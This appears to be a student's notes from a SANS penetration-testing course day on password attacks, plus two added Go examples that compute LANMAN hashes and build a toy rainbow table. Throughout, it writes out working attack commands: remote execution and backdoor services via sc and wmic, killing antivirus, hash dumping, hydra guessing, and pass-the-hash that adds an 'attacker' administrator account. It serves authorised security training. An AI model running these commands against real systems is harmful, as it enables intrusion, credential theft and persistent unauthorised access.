560.4
Day 4: Password attacks
about
Passwords are powerful
cab calloway
announcements
Novak in Holiday 1 from 6-9 tonight
dojosec - Marcus Carey
Running commands on a remote Windows machine
psexec
Sysinternals
net use \\10.10.10.10 /u:falken
or set up a null session?
net use \\10.10.10.10 "" /u:""
prevents you from having to supply credentials on every psexec command
psexec \\10.10.10.10 ipconfig
psexec \\10.10.10.10 cmd.exe
psexec used to send credentials in cleartext
scheduled task
at
simpler syntax
at \\10.10.10.10 hh:mm a|p command
schtasks
more flexible
schtasks /lots /of /parms
starttime in HH:MM:SS
to run as SYSTEM, replace /u /p with '/ru SYSTEM'
check status
at \\10.10.10.10
schtasks /query /s 10.10.10.10
to make sure scheduler is running
net use \\10.10.10.10 pwd /u:adminuser
sc \\10.10.10.10 query schedule
sc
create as a service
net use setup
sc \\10.10.10.10 create evilsvr binpath= [command]
sc \\10.10.10.10 start evilsvr
runs as SYSTEM
will die after 30 seconds
servifythis util will fix
from inguardians.com
makes the API call that reports a successful service start
or run detached:
"cmd.exe /k [command]"
sc \\10.10.10.10 create evilthing binpath= "cmd.exe /k [command]"
wmic
can create, start, kill processes
run net view to get system list
use wmic /node: to run a command on every system
wmic /node:1.2.3.4 /user:admin /password:1234 process call create [command]
example: use wmic to kill HIPS and AV at the start
use to list what is running, to spot developers or admins
exercise slide 15
set up persistent nc backdoor using sc
runs with SYSTEM privs
use wmic to run nc
run nc detached with -d to avoid window popup
runs with admin privs
note: sometimes when you kill a process, port is not freed up
will free in 10-15 minutes
is there a cmd to free immediately?
password attack
exact same passwords often are used on multiple systems
"sync'd passwords"
note: half the class uses IRC regularly
register with nicserv
widgets on your facebook page
Kevin Johnson's profile
questionnaire widget
gaining access
pentester named Atlas
helped write parts of this course
same passwords as each other too
local sports teams, as leetspeak
c0l0rad0
colorado1
company name as password
pick just one password, try against all users
prevents locking out accounts
FOIA requests get you a list of employees in any government agency
formats
LANMAN
case is always upper
dictionaries
custom wordlist: put in likely local passwords
if no account lockout
web applications
lockout turned off to prevent DoS
dictionary generator tool
www.fonlok.com/zijianhuang/kpa
generate wordlist from company website
see slide 32
do wget on entire website
mkdir /tmp/source
cd /tmp/source
wget -r -l 5 http://www.example.com/
pipe through tr to translate space to a newline
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
grep -v '<' wordlist.lst > newlist.lst
cracking
always crack passwords for every system accessed
always add any cracked passwords into dictionary
be careful to clean up after the pentest is over
improving cracking speed
rainbow tables
all possible LANMAN passwords would be 140GB or so
ophcrack uses them
distributed john: djohn
use real machines, not VMs
pricewatch.com
for cheap computer prices
buy many cheap computers, build as crackers
record how long it took to crack passwords (you may be asked)
beware info leakage
copies of pwd files
/etc/passwd, /etc/shadow
SAM backup file
Ntds.dit from AD
john.pot
Googling for hashes
clean up cracked passwords: delete when done
encrypt passwords when in motion across network
don't crack on target system
passwords without cracking
keylogger
core has an agent
make sure allowed by Rules of Engagement
make sure you remove it !!!
sniff in cleartext
Google is good for password cracking: search for the hash
be careful
don't do from customer's IP: too revealing
password reset policy
dates from when it took over a month to crack a password
account lockout
dangerous
take into account before any password guessing attempt
not an issue with cracking, only with guessing
alockout.dll tool to audit what apps may be locking out accounts
Windows
to show the lockout settings
net accounts
net accounts /domain
administrator account cannot be locked out
therefore, excellent target
use user2sid to find out name assoc with SID 500
UNIX
less likely for lockout to be configured
if done, often done using PAM
see PAM documentation on Linux
grep tally /etc/pam.d/*
see slide 44
get a test account, try pwd guessing to observe lockout
or use the point of contact's account
go against cached passwords on Windows systems
HKLM\SECURITY\CACHE\NL$[1-10]
readable only with local SYSTEM privs
encrypted using the LSA key, which is different for every machine
encrypted and salted form of the LANMAN and NT hashes
morning break
assorted turnovers
apples and bananas
cider and orange juice
it's raining outside
THC-hydra
password attack tool
get username with enumeration techniques first
runs on Linux
not configured right on Backtrack (no ssh, etc.)
pw-inspector tool comes with hydra
run against your dictionary file to generate smaller list
trim out passwords that don't meet organization's password policy
not sure if or why this is good to do
by default, Hydra spawns 36 child processes
may work better if you limit number, even to 1
too many may overwhelm the target service
exercise: THC-hydra slide 560.4p52
running hydra
# xhydra
set target IP or list
choose protocol
smb
port 139
smb over netbios over TCP
smbnt
port 445
smb over tcp
pure windows2000+
ssh2
choose port (0 = use default)
pick username(s) and password(s) to try
note that xhydra is constructing a cmdline for hydra
pwd representation formats
Windows SAM
LANMAN hash
idiotic
pad to 14 chars if less
convert to UPPERCASE
split into two 7 char pieces
use each piece as a DES key to encrypt
the constant string KGS!@#$%
this was discovered, led to Samba
concatenate the two pieces
not salted
AAD3B435B51404EE = hash of blank
NT hash
better in some ways, worse in others
pwd up to 256 chars
case is preserved
full pwd hashed using MD4
not salted
both get stored by default in NT, 2000, XP, 2003
no LANMAN stored in Vista, but still used
admin can dump entire database
user can only dump own
AD
%systemroot%\ntds\ntds.dit
encase or FTK would dump directly from there
we use tools to access the accounts and pull the hashes out of the registry
challenge/response on network
not same as pwd representation
LANMAN challenge/response
client initiates auth
server sends challenge
client responds
pad LANMAN hash to 21 bytes
split into 3 seven byte pieces
Use each piece as a DES key to encrypt the challenge
(NTLMv1 does the same, except it uses the NT hash as the starting point)
server does not auth to client
replay is possible
no timestamp
attack
sniff both the challenge and the response
guess a password, encrypt the challenge with it, and compare to see which passwords would yield the observed response
NTLMv1
same as LANMAN challenge/response
only difference is which hash is used
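An added example (not from the course notes) in Go that implements the LANMAN hash steps listed above and the LANMAN challenge/response built from that hash; the constant KGS!@#$% is the real one, the 8-byte challenge is a constructed sample, and the code assumes an ASCII password.

```go
package main

import (
	"crypto/des"
	"fmt"
	"strings"
)

// desEncrypt7 expands a 7-byte key fragment into the 8-byte form DES wants
// (7 key bits per byte, parity in the low bit, which DES ignores) and
// encrypts one 8-byte block with it.
func desEncrypt7(k7, block []byte) []byte {
	k8 := []byte{
		k7[0] >> 1, (k7[0]&0x01)<<6 | k7[1]>>2, (k7[1]&0x03)<<5 | k7[2]>>3,
		(k7[2]&0x07)<<4 | k7[3]>>4, (k7[3]&0x0f)<<3 | k7[4]>>5,
		(k7[4]&0x1f)<<2 | k7[5]>>6, (k7[5]&0x3f)<<1 | k7[6]>>7, k7[6] & 0x7f,
	}
	for i := range k8 {
		k8[i] <<= 1
	}
	c, _ := des.NewCipher(k8) // key is always 8 bytes, so no error
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}
// LMHash as in the notes: uppercase, pad/truncate to 14 bytes, split into two
// 7-byte halves, DES-encrypt the constant "KGS!@#$%" under each, concatenate.
// Assumes ASCII; Windows stores the blank hash for passwords over 14 chars.
func LMHash(password string) []byte {
	padded := make([]byte, 14) // zero padding
	copy(padded, strings.ToUpper(password))
	return append(desEncrypt7(padded[:7], []byte("KGS!@#$%")),
		desEncrypt7(padded[7:], []byte("KGS!@#$%"))...)
}
// LMResponse: pad the 16-byte hash to 21 bytes, split into three 7-byte keys,
// DES-encrypt the server's 8-byte challenge under each, concatenate. NTLMv1 is
// the same with the NT hash; the third key carries only 2 real hash bytes.
func LMResponse(hash, challenge []byte) []byte {
	k := make([]byte, 21)
	copy(k, hash)
	var resp []byte
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt7(k[i:i+7], challenge)...)
	}
	return resp
}
func main() {
	challenge := []byte{1, 2, 3, 4, 5, 6, 7, 8} // constructed sample challenge
	fmt.Printf("%X\n%X\n", LMHash(""), LMResponse(LMHash("password"), challenge))
}
```

The blank-password output is the AAD3B435B51404EE value quoted above, twice, and the case-folding and the 2-byte third key are exactly why the notes call the scheme idiotic.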
NTLMv2
much harder to crack
client initiates auth
server sends challenge
client responds
use NT hash as HMAC-MD5 key to hash the username and domainname
result is called the NTLMv2 one-way function (OWF)
response = HMAC-MD5(key=OWF,f(server challenge, timestamp, client challenge, other items))
server also auths to client: bidirectional authentication
see slide 70 ff.
there is a timestamp
we aren't sending username and pwd, just sending the (challenge/response based on the) hash to see if it matches
"the open specification promise" site on MS european disclosures (?)
still possible to crack using sniffed challenge/response, but much harder than NTLMv1
MS Kerberos
UNIX representations
rely on crypt(3) function
input: pwd, salt
crypt routine varies according to version, distro
see slide 72 for table
no prefix means traditional DES
$1$ means MD5
_ means BSDi extended DES
$2$ or $2a$ means Blowfish
$5$ means SHA-256 (linux)
$6$ means SHA-512 (linux)
DES password scheme
truncate pwd to 8 chars
shrink to 7 bits/char
use this as 56-bit key to DES encrypt
etc.
slide 73
MD5-based
does 1000 MD5 hashing iterations
salt prevents you from building rainbow tables because you'd need a table for every possible salt
obtaining pwd hashes
obtaining *NIX hashes
not usually in /etc/passwd
usually in /etc/shadow
get both, use John's unshadow tool to recombine
obtaining Windows hashes
pwdump family
leaves memory artifacts
can crash, because DLL injection into LSASS
DEP often makes it crash
pwdump2
pwdump3
pwdump3e
pwdump6
fgdump
leaves memory artifacts
used to be a wrapper for pwdump, to shut off AV
from "the fizzgig" of the Foofus group
get on their mailing list
doesn't just dump passwords
also pwd history
check history for similarity (incrementing a number?)
see slide 80: missed something?
meterpreter
no file and print sharing is needed
no memory artifacts
priv module
smb_relay tool to sniff hash off network, schedule a job to shell in
sniff chall/resp off network
easiest way
fgdump exercise slide 84
against local
against falken on 10.10.10.10
see slide 86 on bouncing fgdump off netcat relay
linux: 445 in, 80 out to Windows
windows attack on port 80: will IDS detect?
IDS should:
detect port 80 use
run through all app signatures
lunch break
John the Ripper
by Solar Designer
designed (only) for speed
www.openwall.com/john
pro version is $40
recommend: spend the $40
cracks other types
linux/unix
windows
LANMAN
NT (with patch)
LANMAN chall/response (with patch and OpenSSL)
NTLMv1
others
includes keyweighting
in brute force mode
prefers certain keys on keyboard that are more likely
cracking modes
single crack
use login and GECOS info
wordlist
for dictionary use
including mangling
leetspeak substitution
etc.
external
write your own code
never used?
john.pot
Avian transfer protocol
IP over carrier pigeon
not a Powerpoint file!
john will not load passwords already in john.pot
slide 94
john.rec
pointer to where john is at
written when john crashes or every 10 minutes
hit Ctrl-C twice fast to terminate john without updating john.rec
remove john.pot and john.rec if you want to start fresh
john console
hit spacebar for status
c/s = "combinations per second"
speed
can be compiled to support specific processor types
$ ./john --test
checks speed
real = system without load
distributed cracking
not officially supported
have different ones do different accounts (but do same salt on same system)
have different ones do different lengths
have each instance write john.pot incl --session=[name]
exercise slide 99 ff.
normal compilation: make linux-x86-any
v 1.7.2
copy src
copy patches
patch -p0 < john-1.7.2-ntlm-alainesp-6.1.diff
move windows pwds to linux using netcat
sherri davidoff
"alien"
philosecurity
daisy duke
runs strings on a memdump
use every string in password list for john
Cain
cracks most password types
many oddball interesting ones
ike-psk
only for aggressive mode, because then pwd is cleartext
website: cifvicious
VoIP cracking tools
Cain sniffer
SIP/RTP
CIF/VoIP string
can play back audio
wireshark can do that too
VNC
RDP
adrian crenshaw
irongeek
see video on how to use Cain to capture RDP keystrokes
he has scripts to make them readable
Wireless scanner
like netstumbler
SecureID token generator
Box revealer
syskey decoder
double arp cache poisoning
both directions
pretend to be gateway to victim
pretend to be victim to gateway
just click on the IP addresses and "start"
Cain exercise slide 117 ff.
Afternoon break
warm giant pretzels
announcements
food at SANS launch party, Key 9, 7 PM
idiocracy
q.v.
movie I think
same guy who did office space
Rainbow table attacks
idea: pre-create all possible hashes
but doesn't work that way
take advantage of "time-memory tradeoff"
Paper by Martin Hellman
www-ee.stanford.edu/~hellman/publications/36.pdf
see slide 132
many pentesters carry
carry 160GB of high quality rainbow tables for LANMAN
some are more efficient than others
requirements
tables
tool that is compatible with the table you have
need the non-salted hashes
getting tables
generate our own
rtgen
www.antsight.com/zsl/rainbowcrack
precomp
part of Ophcrack
shg
SMB Hash Generator
see slide 135 for URL
pre-generated set
free rainbow tables project
www.freerainbowtables.com
Shmoo group
rainbowtables.shmoo.com
Ophcrack has smaller sets for free
Commercial set
Objectif-Securite
creators of Ophcrack
Astalvista.net
Table storage
would need 120TB to store all hashes
Rainbow Tables ignore 99% of hashes that they create
Create a chain (1000s or 1000000s of iterations long)
password hash
reduction function
tweaks a hash to create a new possible password
there are many possible reduction functions
how
start with initial pwd
hash it
perform reduction function to get (nonsensical) pwd 2
say, first 7 of hash is next pwd
hash pwd2
reduction yields pwd 3
Then make lots of chains with different initial passwords
Compare the chains, looking for as little overlap as possible
store chains as rainbow tables
use different reduction functions 1,2,3,4 in subsequent steps to limit overlap
To use
get your hash
run a chain based on your hash
compare your chain members with the end pwd of every chain, trying each reduction function on it
if match, pwd is in that chain
reinflate that chain again to find real pwd
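An added example (not from the course notes) in Go of the chain construction and lookup just described, scaled down to a constructed toy: 4-character passwords over a 6-letter alphabet, SHA-256 standing in for the unsalted hash, and a reduction function that changes with the column index as the notes describe.

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

// Toy (constructed) parameters: 4-char passwords over 6 letters; SHA-256 stands in for LM/NT.
const alphabet, pwLen, chainLen = "abcdef", 4, 50
func hash(pw string) [32]byte { return sha256.Sum256([]byte(pw)) }
// reduce maps a hash back to a (nonsensical) password; mixing in column i varies the function per step.
func reduce(h [32]byte, i int) string {
	out := make([]byte, pwLen)
	for j := range out {
		out[j] = alphabet[(int(h[j])+i)%len(alphabet)]
	}
	return string(out)
}
// walk advances a chain from pw through columns from..to-1 (hash, then reduce).
func walk(pw string, from, to int) string {
	for i := from; i < to; i++ {
		pw = reduce(hash(pw), i)
	}
	return pw
}
// BuildTable keeps only endpoint -> start; every intermediate hash is dropped.
func BuildTable(starts []string) map[string]string {
	t := make(map[string]string)
	for _, s := range starts {
		t[walk(s, 0, chainLen)] = s
	}
	return t
}
// Lookup tries each column the target could occupy: finish the chain from
// there, and on an endpoint hit reinflate that chain until the hash matches.
func Lookup(t map[string]string, target [32]byte) (string, bool) {
	for col := chainLen - 1; col >= 0; col-- {
		if start, ok := t[walk(reduce(target, col), col+1, chainLen)]; ok {
			for cand, i := start, 0; i < chainLen; i++ {
				if hash(cand) == target {
					return cand, true
				}
				cand = reduce(hash(cand), i)
			}
		}
	}
	return "", false
}
func main() {
	fmt.Println(Lookup(BuildTable([]string{"aaaa", "fedc", "abcd"}), hash(walk("abcd", 0, 10))))
}
```

A false endpoint hit (a chain that merges into a stored one without containing the target) is handled by the inner loop failing to match and the outer loop moving on to the next column.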
tools
Ophcrack
Rainbowcrack
interesting video demos
see slide 144
Ophcrack exercise slide 145
if you have a computer with a lot of RAM, give Ophcrack more memory
make the most powerful PC the password cracking system
use nc to get the sam.txt to the Ophcrack VM
Pass-the-hash attacks
how auth works
send pwd hash to target
target compares the hash with the hash it has
so this is the same as sending pwd in cleartext, except pwd is the hash
much faster than cracking; we are simply going to use the hash
pass-the-hash toolkit
Hernan Ochoa
of Core Security
http://oss.coresecurity.com/projects/pshtoolkit.html
oss.coresecurity.com > Projects > Pshtoolkit
uses Windows to attack Windows
also includes
whosthere.exe
dumps current user's session info
including hashes
from lsass.exe process
walk up to a running system and use
genhash.exe
give it a cleartext password
it generates LANMAN and NT hashes to screen
if know user's password, use this to generate hashes to pass
iam.exe
changes the current user's hash to one supplied on cmdline
hunts through the memory of the lsass.exe process and changes the hash
Samba cannot do pass-the-hash attack
JoMo-kun of Foofus
allows Linux to attack Windows
needs patching
have 2 versions of Samba, one stock, one patched
SAMBA patched to auth using env var SMBHASH with LANMAN:NT, if it is set
$ export SMBHASH="46F25...625AC25265:3FE465...76546"
now use winexe.exe
mount shares
add users
change group memberships
run a program on target
like psexec
pass a hash from an account in the admin group
Use meterpreter to dump the pwd hashes from target
exit technique
seh
structured exception handler
thread
literally kills the thread
process
kills the process meterpreter is in
may bomb the entire box
use exploit, set payload, etc.
set payload of meterpreter, such as windows/meterpreter/bind_tcp
run the exploit
use priv
loads the priv metasploit module
can dump the SAM database of target
hashdump
look for hashes of SID 500 on screen, and use them to set envvar SMBHASH
echo $SMBHASH
to check if ok
export SMBHASH="lanmanhash:nthash"
compile Samba with --smbmount (?)
exercise slide 163
note: meterpreter's "hashdump" command is used to obtain hashes
# cd /home/tools/samba*/source/bin
# ./smbmount //1.1.1.1/c$ /mnt/target -o username=administrator
enter any pwd when prompted, because the Foofus patch will substitute the SMBHASH envvar
# ./net user ADD attacker password -r 1.1.1.1 -U administrator
# ./net rpc group ADDMEM administrators attacker -r 1.1.1.1 -U administrator
to detect: workstation should never SMB communicate with other workstations, only with servers
WPAD
web proxy auto-detection